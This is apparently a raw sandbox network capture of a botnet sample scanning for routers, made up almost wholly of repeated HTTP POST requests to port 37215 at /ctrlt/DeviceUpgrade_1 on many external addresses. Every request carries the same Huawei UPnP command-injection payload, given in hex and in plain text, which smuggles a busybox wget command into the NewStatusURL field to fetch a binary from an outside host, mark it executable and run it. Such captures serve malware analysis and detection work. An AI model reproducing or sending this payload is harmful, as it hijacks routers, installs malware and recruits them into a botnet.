                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:11.849999905 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:14.473778963 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:19.593657017 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:29.577116013 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:50.568298101 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:31.526633024 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      146192.168.2.1436222156.175.26.14737215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:10.508646965 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      147192.168.2.144310441.120.210.8837215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:10.509908915 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      148192.168.2.145613241.175.137.16337215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:10.511198997 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:11.113872051 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
